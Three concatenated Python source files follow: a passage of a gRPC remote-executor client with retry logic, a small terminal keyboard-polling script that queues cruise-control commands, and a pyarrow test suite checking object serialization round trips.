logging.info('Received retryable gRPC error: %s', e)
raise execution_context.RetryableError(e)
else:
raise
def _is_retryable_grpc_error(error):
"""Predicate defining what is a retryable gRPC error."""
non_retryable_errors = {
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.PERMISSION_DENIED,
grpc.StatusCode.FAILED_PRECONDITION,
grpc.StatusCode.ABORTED,
grpc.StatusCode.OUT_OF_RANGE,
grpc.StatusCode.UNIMPLEMENTED,
grpc.StatusCode.DATA_LOSS,
grpc.StatusCode.UNAUTHENTICATED,
}
return (isinstance(error, grpc.RpcError) and
error.code() not in non_retryable_errors)
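# Illustrative sketch (an assumption about how callers might use `_request`,
# not part of this module's API): retryable gRPC failures surface as
# `execution_context.RetryableError`, so a hypothetical caller could retry:
#
#   for attempt in range(3):          # retry budget is arbitrary here
#     try:
#       response = _request(stub.CreateValue, request)
#       break
#     except execution_context.RetryableError:
#       if attempt == 2:
#         raise                       # give up after the final attempt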
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance."""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None,
dispose_batch_size=20):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
dispose_batch_size: The batch size for requests to dispose of remote
worker values. Lower values send more requests to the remote worker,
but clean up values sooner and may therefore reduce memory usage on
the remote worker.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
py_typecheck.check_type(dispose_batch_size, int)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
logging.debug('Creating new ExecutorStub with RPC_MODE=%s', rpc_mode)
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
self._dispose_batch_size = dispose_batch_size
self._dispose_request = executor_pb2.DisposeRequest()
if rpc_mode == 'STREAMING':
logging.debug('Creating Bidi stream')
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def close(self):
if self._bidi_stream is not None:
logging.debug('Closing bidi stream')
self._bidi_stream.close()
def _dispose(self, value_ref: executor_pb2.ValueRef):
"""Disposes of the remote value stored on the worker service."""
self._dispose_request.value_ref.append(value_ref)
if len(self._dispose_request.value_ref) < self._dispose_batch_size:
return
dispose_request = self._dispose_request
self._dispose_request = executor_pb2.DisposeRequest()
if self._bidi_stream is None:
_request(self._stub.Dispose, dispose_request)
else:
send_request_fut = self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(dispose=dispose_request))
# We don't care about the response, and so don't bother to await it.
# Just start it as a task so that it runs at some point.
asyncio.get_event_loop().create_task(send_request_fut)
@tracing.trace(span=True)
async def create_value(self, value, type_spec=None):
@tracing.trace
def serialize_value():
return executor_service_utils.serialize_value(value, type_spec)
value_proto, type_spec = serialize_value()
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if self._bidi_stream is None:
response = _request(self._stub.CreateValue, create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
@tracing.trace(span=True)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if self._bidi_stream is None:
response = _request(self._stub.CreateCall, create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
@tracing.trace(span=True)
async def create_struct(self, elements):
constructed_anon_tuple = anonymous_tuple.from_container(elements)
proto_elem = []
type_elem = []
for k, v in anonymous_tuple.iter_elements(constructed_anon_tuple):
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateStructRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.StructType(type_elem)
request = executor_pb2.CreateStructRequest(element=proto_elem)
if self._bidi_stream is None:
response = _request(self._stub.CreateStruct, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_struct=request))).create_struct
py_typecheck.check_type(response, executor_pb2.CreateStructResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
py_typecheck.check_type(source.type_signature, computation_types.StructType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if self._bidi_stream is None:
response = _request(self._stub.CreateSelection, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if self._bidi_stream is None:
response = _request(self._stub.Compute, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_service_utils.deserialize_value(response.value)
return value
|
keyboard_ctrl.py
|
import sys
import termios
import time
from termios import (BRKINT, CS8, CSIZE, ECHO, ICANON, ICRNL, IEXTEN, INPCK,
ISIG, ISTRIP, IXON, PARENB, VMIN, VTIME)
from typing import Any
import cereal.messaging as messaging
# Indexes for termios list.
IFLAG = 0
OFLAG = 1
CFLAG = 2
LFLAG = 3
ISPEED = 4
OSPEED = 5
CC = 6
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
# set
mode = termios.tcgetattr(fd)
mode[IFLAG] = mode[IFLAG] & ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON)
#mode[OFLAG] = mode[OFLAG] & ~(OPOST)
mode[CFLAG] = mode[CFLAG] & ~(CSIZE | PARENB)
mode[CFLAG] = mode[CFLAG] | CS8
mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON | IEXTEN | ISIG)
mode[CC][VMIN] = 1
mode[CC][VTIME] = 0
termios.tcsetattr(fd, termios.TCSAFLUSH, mode)
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def keyboard_poll_thread(q):
while True:
c = getch()
print("got %s" % c)
if c == '1':
q.put(str("cruise_up"))
if c == '2':
q.put(str("cruise_down"))
if c == '3':
q.put(str("cruise_cancel"))
if c == 'q':
exit(0)
def test(q):
while 1:
print("hello")
time.sleep(1.0)
if __name__ == '__main__':
from multiprocessing import Process, Queue
q : Any = Queue()
p = Process(target=test, args=(q,))
p.daemon = True
p.start()
keyboard_poll_thread(q)
|
test_serialization.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import division
import pytest
import collections
import datetime
import os
import pickle
import subprocess
import string
import sys
import pyarrow as pa
import numpy as np
import pyarrow.tests.util as test_util
try:
import torch
except ImportError:
torch = None
# Blacklist the module in case `import torch` is costly before
# failing (ARROW-2071)
sys.modules['torch'] = None
def assert_equal(obj1, obj2):
if torch is not None and torch.is_tensor(obj1) and torch.is_tensor(obj2):
assert torch.equal(obj1, obj2)
return
module_numpy = (type(obj1).__module__ == np.__name__ or
type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ()) or
(hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) ==
set(list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different."
.format(
obj1,
obj2))
try:
# Workaround to make comparison of OrderedDicts work on Python 2.7
if obj1 == obj2:
return
except Exception:
pass
if obj1.__dict__ == {}:
print("WARNING: Empty dict in ", obj1)
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (pa.lib.is_named_tuple(type(obj1)) or
pa.lib.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif isinstance(obj1, pa.Array) and isinstance(obj2, pa.Array):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Tensor) and isinstance(obj2, pa.Tensor):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.RecordBatch) and isinstance(obj2, pa.RecordBatch):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Table) and isinstance(obj2, pa.Table):
assert obj1.equals(obj2)
else:
assert type(obj1) == type(obj2) and obj1 == obj2, \
"Objects {} and {} are different.".format(obj1, obj2)
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 999,
[1 << 100, [1 << 100]], "a", string.printable, "\u262F",
"hello world", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {}, {(1, 2): 1}, {(): 2},
[1, "hello", 3.0], u"\u262F", 42.0, (1.0, "hi"),
[1, 2, 3, None], [(None,), 3, 1.0], ["h", "e", "l", "l", "o", None],
(None, None), ("hello", None), (True, False),
{True: "hello", False: "world"}, {"hello": "world", 1: 42, 2.5: 45},
{"hello": set([2, 3]), "world": set([42.0]), "this": None},
np.int8(3), np.int32(4), np.int64(5),
np.uint8(3), np.uint32(4), np.uint64(5),
np.float16(1.9), np.float32(1.9),
np.float64(1.9), np.zeros([8, 20]),
np.random.normal(size=[17, 10]), np.array(["hi", 3]),
np.array(["hi", 3], dtype=object),
np.random.normal(size=[15, 13]).T
]
if sys.version_info >= (3, 0):
PRIMITIVE_OBJECTS += [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
PRIMITIVE_OBJECTS += [long(42), long(1 << 62), long(0), # noqa
np.array([["hi", u"hi"],
[1.3, long(1)]])] # noqa
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[4, 4]) for i in range(5)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
((((((((((),),),),),),),),),),
{"a": {"b": {"c": {"d": {}}}}},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(1), Foo(42)]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class SubQuxPickle(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [Exception("Test object."), CustomError(), Point(11, y=22),
Foo(), Bar(), Baz(), Qux(), SubQux(), SubQuxPickle(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
collections.Counter([1, 1, 1, 2, 2, 3, "a", "b"])]
def make_serialization_context():
context = pa.default_serialization_context()
context.register_type(Foo, "Foo")
context.register_type(Bar, "Bar")
context.register_type(Baz, "Baz")
context.register_type(Qux, "Quz")
context.register_type(SubQux, "SubQux")
context.register_type(SubQuxPickle, "SubQuxPickle", pickle=True)
context.register_type(Exception, "Exception")
context.register_type(CustomError, "CustomError")
context.register_type(Point, "Point")
context.register_type(NamedTupleExample, "NamedTupleExample")
return context
global_serialization_context = make_serialization_context()
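# Minimal usage sketch (illustrative only; relies on the registrations above
# and on pyarrow's legacy serialize/deserialize API):
#
#   buf = pa.serialize(Foo(1), context=global_serialization_context).to_buffer()
#   obj = pa.deserialize(buf, context=global_serialization_context)
#   assert obj == Foo(1)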
def serialization_roundtrip(value, scratch_buffer,
context=global_serialization_context):
writer = pa.FixedSizeBufferWriter(scratch_buffer)
pa.serialize_to(value, writer, context=context)
reader = pa.BufferReader(scratch_buffer)
result = pa.deserialize_from(reader, None, context=context)
assert_equal(value, result)
_check_component_roundtrip(value, context=context)
def _check_component_roundtrip(value, context=global_serialization_context):
# Test to/from components
serialized = pa.serialize(value, context=context)
components = serialized.to_components()
from_comp = pa.SerializedPyObject.from_components(components)
recons = from_comp.deserialize(context=context)
assert_equal(value, recons)
@pytest.yield_fixture(scope='session')
def large_buffer(size=32*1024*1024):
return pa.allocate_buffer(size)
def large_memory_map(tmpdir_factory, size=100*1024*1024):
path = (tmpdir_factory.mktemp('data')
.join('pyarrow-serialization-tmp-file').strpath)
# Create a large memory mapped file
with open(path, 'wb') as f:
f.write(np.random.randint(0, 256, size=size)
.astype('u1')
.tobytes()
[:size])
return path
def test_clone():
context = pa.SerializationContext()
class Foo(object):
pass
def custom_serializer(obj):
return 0
def custom_deserializer(serialized_obj):
return (serialized_obj, 'a')
context.register_type(Foo, 'Foo', custom_serializer=custom_serializer,
custom_deserializer=custom_deserializer)
new_context = context.clone()
f = Foo()
serialized = pa.serialize(f, context=context)
deserialized = serialized.deserialize(context=context)
assert deserialized == (0, 'a')
serialized = pa.serialize(f, context=new_context)
deserialized = serialized.deserialize(context=new_context)
assert deserialized == (0, 'a')
def test_primitive_serialization(large_buffer):
for obj in PRIMITIVE_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_integer_limits(large_buffer):
# Check that Numpy scalars can be represented up to their limit values
# (except np.uint64 which is limited to 2**63 - 1)
for dt in [np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64]:
scal = dt(np.iinfo(dt).min)
serialization_roundtrip(scal, large_buffer)
if dt is not np.uint64:
scal = dt(np.iinfo(dt).max)
serialization_roundtrip(scal, large_buffer)
else:
scal = dt(2**63 - 1)
serialization_roundtrip(scal, large_buffer)
for v in (2**63, 2**64 - 1):
scal = dt(v)
with pytest.raises(pa.ArrowInvalid):
pa.serialize(scal)
def test_serialize_to_buffer():
for nthreads in [1, 4]:
for value in COMPLEX_OBJECTS:
buf = pa.serialize(value).to_buffer(nthreads=nthreads)
result = pa.deserialize(buf)
assert_equal(value, result)
def test_complex_serialization(large_buffer):
for obj in COMPLEX_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_custom_serialization(large_buffer):
for obj in CUSTOM_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_default_dict_serialization(large_buffer):
pytest.importorskip("cloudpickle")
obj = collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
serialization_roundtrip(obj, large_buffer)
def test_numpy_serialization(large_buffer):
for t in ["bool", "int8", "uint8", "int16", "uint16", "int32",
"uint32", "float16", "float32", "float64", "<U1", "<U2", "<U3",
"<U4", "|S1", "|S2", "|S3", "|S4", "|O"]:
obj = np.random.randint(0, 10, size=(100, 100)).astype(t)
serialization_roundtrip(obj, large_buffer)
obj = obj[1:99, 10:90]
serialization_roundtrip(obj, large_buffer)
def test_datetime_serialization(large_buffer):
data = [
# Principia Mathematica published
datetime.datetime(year=1687, month=7, day=5),
# Some random date
datetime.datetime(year=1911, month=6, day=3, hour=4,
minute=55, second=44),
# End of WWI
datetime.datetime(year=1918, month=11, day=11),
# Beginning of UNIX time
datetime.datetime(year=1970, month=1, day=1),
# The Berlin wall falls
datetime.datetime(year=1989, month=11, day=9),
# Another random date
datetime.datetime(year=2011, month=6, day=3, hour=4,
minute=0, second=3),
# Another random date
datetime.datetime(year=1970, month=1, day=3, hour=4,
minute=0, second=0)
]
for d in data:
serialization_roundtrip(d, large_buffer)
def test_torch_serialization(large_buffer):
pytest.importorskip("torch")
serialization_context = pa.default_serialization_context()
pa.register_torch_serialization_handlers(serialization_context)
# These are the only types that are supported for the
# PyTorch to NumPy conversion
for t in ["float32", "float64",
"uint8", "int16", "int32", "int64"]:
obj = torch.from_numpy(np.random.randn(1000).astype(t))
serialization_roundtrip(obj, large_buffer,
context=serialization_context)
tensor_requiring_grad = torch.randn(10, 10, requires_grad=True)
serialization_roundtrip(tensor_requiring_grad, large_buffer,
context=serialization_context)
@pytest.mark.skipif(not torch or not torch.cuda.is_available(),
reason="requires pytorch with CUDA")
def test_torch_cuda():
# ARROW-2920: This used to segfault if torch is not imported
# before pyarrow
# Note that this test will only catch the issue if it is run
# with a pyarrow that has been built in the manylinux1 environment
torch.nn.Conv2d(64, 2, kernel_size=3, stride=1,
padding=1, bias=False).cuda()
def test_numpy_immutable(large_buffer):
obj = np.zeros([10])
writer = pa.FixedSizeBufferWriter(large_buffer)
pa.serialize_to(obj, writer, global_serialization_context)
reader = pa.BufferReader(large_buffer)
result = pa.deserialize_from(reader, None, global_serialization_context)
with pytest.raises(ValueError):
result[0] = 1.0
def test_numpy_base_object(tmpdir):
# ARROW-2040: deserialized Numpy array should keep a reference to the
# owner of its memory
path = os.path.join(str(tmpdir), 'zzz.bin')
data = np.arange(12, dtype=np.int32)
with open(path, 'wb') as f:
f.write(pa.serialize(data).to_buffer())
serialized = pa.read_serialized(pa.OSFile(path))
result = serialized.deserialize()
assert_equal(result, data)
serialized = None
assert_equal(result, data)
assert result.base is not None
# see https://issues.apache.org/jira/browse/ARROW-1695
def test_serialization_callback_numpy():
class DummyClass(object):
pass
def serialize_dummy_class(obj):
x = np.zeros(4)
return x
def deserialize_dummy_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(DummyClass, "DummyClass",
custom_serializer=serialize_dummy_class,
custom_deserializer=deserialize_dummy_class)
pa.serialize(DummyClass(), context=context)
def test_numpy_subclass_serialization():
# Check that we can properly serialize subclasses of np.ndarray.
class CustomNDArray(np.ndarray):
def __new__(cls, input_array):
array = np.asarray(input_array).view(cls)
return array
def serializer(obj):
return {'numpy': obj.view(np.ndarray)}
def deserializer(data):
array = data['numpy'].view(CustomNDArray)
return array
context = pa.default_serialization_context()
context.register_type(CustomNDArray, 'CustomNDArray',
custom_serializer=serializer,
custom_deserializer=deserializer)
x = CustomNDArray(np.zeros(3))
serialized = pa.serialize(x, context=context).to_buffer()
new_x = pa.deserialize(serialized, context=context)
assert type(new_x) == CustomNDArray
assert np.alltrue(new_x.view(np.ndarray) == np.zeros(3))
def test_numpy_matrix_serialization(tmpdir):
class CustomType(object):
def __init__(self, val):
self.val = val
path = os.path.join(str(tmpdir), 'pyarrow_npmatrix_serialization_test.bin')
array = np.random.randint(low=-1, high=1, size=(2, 2))
for data_type in [str, int, float, CustomType]:
matrix = np.matrix(array.astype(data_type))
with open(path, 'wb') as f:
f.write(pa.serialize(matrix).to_buffer())
serialized = pa.read_serialized(pa.OSFile(path))
result = serialized.deserialize()
assert_equal(result, matrix)
assert_equal(result.dtype, matrix.dtype)
serialized = None
assert_equal(result, matrix)
assert result.base is not None
def test_pyarrow_objects_serialization(large_buffer):
# NOTE: We have to construct these objects inside the test function,
# or they will affect 'test_total_bytes_allocated'.
pyarrow_objects = [
pa.array([1, 2, 3, 4]), pa.array(['1', u'never U+1F631', '',
u"233 * U+1F600"]),
pa.array([1, None, 2, 3]),
pa.Tensor.from_numpy(np.random.rand(2, 3, 4)),
pa.RecordBatch.from_arrays(
[pa.array([1, None, 2, 3]),
pa.array(['1', u'never U+1F631', '', u"233 * u1F600"])],
['a', 'b']),
pa.Table.from_arrays([pa.array([1, None, 2, 3]),
pa.array(['1', u'never U+1F631', '',
u"233 * u1F600"])],
['a', 'b'])
]
for obj in pyarrow_objects:
serialization_roundtrip(obj, large_buffer)
def test_buffer_serialization():
class BufferClass(object):
pass
def serialize_buffer_class(obj):
return pa.py_buffer(b"hello")
def deserialize_buffer_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(
BufferClass, "BufferClass",
custom_serializer=serialize_buffer_class,
custom_deserializer=deserialize_buffer_class)
b = pa.serialize(BufferClass(), context=context).to_buffer()
assert pa.deserialize(b, context=context).to_pybytes() == b"hello"
@pytest.mark.skip(reason="extensive memory requirements")
def test_arrow_limits(self):
def huge_memory_map(temp_dir):
return large_memory_map(temp_dir, 100 * 1024 * 1024 * 1024)
with pa.memory_map(huge_memory_map, mode="r+") as mmap:
# Test that objects that are too large for Arrow throw a Python
# exception. These tests give out of memory errors on Travis and need
# to be run on a machine with lots of RAM.
x = 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * ["s"]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [["1"], 2, 3, [{"s": 4}]]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [{"s": 1}] + 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = np.zeros(2 ** 25)
serialization_roundtrip(x, mmap)
del x
x = [np.zeros(2 ** 18) for _ in range(2 ** 7)]
serialization_roundtrip(x, mmap)
del x
def test_serialization_callback_error():
class TempClass(object):
pass
# Pass a SerializationContext into serialize, but TempClass
# is not registered
serialization_context = pa.SerializationContext()
val = TempClass()
with pytest.raises(pa.SerializationCallbackError) as err:
serialized_object = pa.serialize(val, serialization_context)
assert err.value.example_object == val
serialization_context.register_type(TempClass, "TempClass")
serialized_object = pa.serialize(TempClass(), serialization_context)
deserialization_context = pa.SerializationContext()
# Pass a SerializationContext into deserialize, but TempClass
# is not registered
with pytest.raises(pa.DeserializationCallbackError) as err:
serialized_object.deserialize(deserialization_context)
assert err.value.type_id == "TempClass"
class TempClass2(object):
pass
# Make sure that we receive an error when we use an inappropriate value for
# the type_id argument.
with pytest.raises(TypeError):
serialization_context.register_type(TempClass2, 1)
def test_fallback_to_subclasses():
class SubFoo(Foo):
def __init__(self):
Foo.__init__(self)
# should be able to serialize/deserialize an instance
# if a base class has been registered
serialization_context = pa.SerializationContext()
serialization_context.register_type(Foo, "Foo")
subfoo = SubFoo()
# should fall back to the Foo serializer
serialized_object = pa.serialize(subfoo, serialization_context)
reconstructed_object = serialized_object.deserialize(
serialization_context
)
assert type(reconstructed_object) == Foo
class Serializable(object):
pass
def serialize_serializable(obj):
return {"type": type(obj), "data": obj.__dict__}
def deserialize_serializable(obj):
val = obj["type"].__new__(obj["type"])
val.__dict__.update(obj["data"])
return val
class SerializableClass(Serializable):
def __init__(self):
self.value = 3
def test_serialize_subclasses():
# This test shows how subclasses can be handled in an idiomatic way
# by having only a serializer for the base class
# This technique should however be used with care, since pickling
# type(obj) with cloudpickle will include the full class definition
# in the serialized representation.
# This means the class definition is part of every instance of the
# object, which in general is not desirable; registering all subclasses
# with register_type will result in faster and more memory
# efficient serialization.
context = pa.default_serialization_context()
context.register_type(
Serializable, "Serializable",
custom_serializer=serialize_serializable,
custom_deserializer=deserialize_serializable)
a = SerializableClass()
serialized = pa.serialize(a, context=context)
deserialized = serialized.deserialize(context=context)
assert type(deserialized).__name__ == SerializableClass.__name__
assert deserialized.value == 3
def test_serialize_to_components_invalid_cases():
buf = pa.py_buffer(b'hello')
components = {
'num_tensors': 0,
'num_ndarrays': 0,
'num_buffers': 1,
'data': [buf]
}
with pytest.raises(pa.ArrowInvalid):
pa.deserialize_components(components)
components = {
'num_tensors': 0,
'num_ndarrays': 1,
'num_buffers': 0,
'data': [buf, buf]
}
with pytest.raises(pa.ArrowInvalid):
pa.deserialize_components(components)
def test_deserialize_components_in_different_process():
arr = pa.array([1, 2, 5, 6], type=pa.int8())
ser = pa.serialize(arr)
data = pickle.dumps(ser.to_components(), protocol=-1)
code = """if 1:
import pickle
import pyarrow as pa
data = {0!r}
components = pickle.loads(data)
arr = pa.deserialize_components(components)
assert arr.to_pylist() == [1, 2, 5, 6], arr
""".format(data)
subprocess_env = test_util.get_modified_env_with_pythonpath()
print("** sys.path =", sys.path)
print("** setting PYTHONPATH to:", subprocess_env['PYTHONPATH'])
subprocess.check_call(["python", "-c", code], env=subprocess_env)
def test_serialize_read_concatenated_records():
# ARROW-1996 -- see stream alignment work in ARROW-2840, ARROW-3212
f = pa.BufferOutputStream()
pa.serialize_to(12, f)
pa.serialize_to(23, f)
buf = f.getvalue()
f = pa.BufferReader(buf)
pa.read_serialized(f).deserialize()
pa.read_serialized(f).deserialize()
@pytest.mark.skipif(os.name == 'nt', reason="deserialize_regex not pickleable")
def test_deserialize_in_different_process():
from multiprocessing import Process, Queue
import re
regex = re.compile(r"\d+\.\d*")
serialization_context = pa.SerializationContext()
serialization_context.register_type(type(regex), "Regex", pickle=True)
serialized = pa.serialize(regex, serialization_context)
serialized_bytes = serialized.to_buffer().to_pybytes()
def deserialize_regex(serialized, q):
import pyarrow as pa
q.put(pa.deserialize(serialized))
q = Queue()
p = Process(target=deserialize_regex, args=(serialized_bytes, q))
p.start()
assert q.get().pattern == regex.pattern
p.join()
def test_deserialize_buffer_in_different_process():
import tempfile
f = tempfile.NamedTemporaryFile(delete=False)
b = pa.serialize(pa.py_buffer(b'hello')).to_buffer()
f.write(b.to_pybytes())
f.close()
subprocess_env = test_util.get_modified_env_with_pythonpath()
dir_path = os.path.dirname(os.path.realpath(__file__))
python_file = os.path.join(dir_path, 'deserialize_buffer.py')
subprocess.check_call([sys.executable, python_file, f.name],
env=subprocess_env)
def test_set_pickle():
# Use a custom type to trigger pickling.
class Foo(object):
pass
context = pa.SerializationContext()
context.register_type(Foo, 'Foo', pickle=True)
test_object = Foo()
# Define a custom serializer and deserializer to use in place of pickle.
def dumps1(obj):
return b'custom'
def loads1(serialized_obj):
return serialized_obj + b' serialization 1'
# Test that setting a custom pickler changes the behavior.
context.set_pickle(dumps1, loads1)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 1'
# Define another custom serializer and deserializer.
def dumps2(obj):
return b'custom'
def loads2(serialized_obj):
return serialized_obj + b' serialization 2'
# Test that setting another custom pickler changes the behavior again.
context.set_pickle(dumps2, loads2)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 2'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="need Python 3.6")
def test_path_objects(tmpdir):
# Test compatibility with PEP 519 path-like objects
import pathlib
p = pathlib.Path(tmpdir) / 'zzz.bin'
obj = 1234
pa.serialize_to(obj, p)
res = pa.deserialize_from(p, None)
assert res == obj
def test_tensor_alignment():
# Deserialized numpy arrays should be 64-byte aligned.
x = np.random.normal(size=(10, 20, 30))
y = pa.deserialize(pa.serialize(x).to_buffer())
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i) for i in range(100)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (1,)) for i in range(20)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (5,)) for i in range(1, 8)]
xs = [xs[i][(i + 1) * (slice(1, 3),)] for i in range(len(xs))]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
def test_serialization_determinism():
for obj in COMPLEX_OBJECTS:
buf1 = pa.serialize(obj).to_buffer()
buf2 = pa.serialize(obj).to_buffer()
assert buf1.to_pybytes() == buf2.to_pybytes()
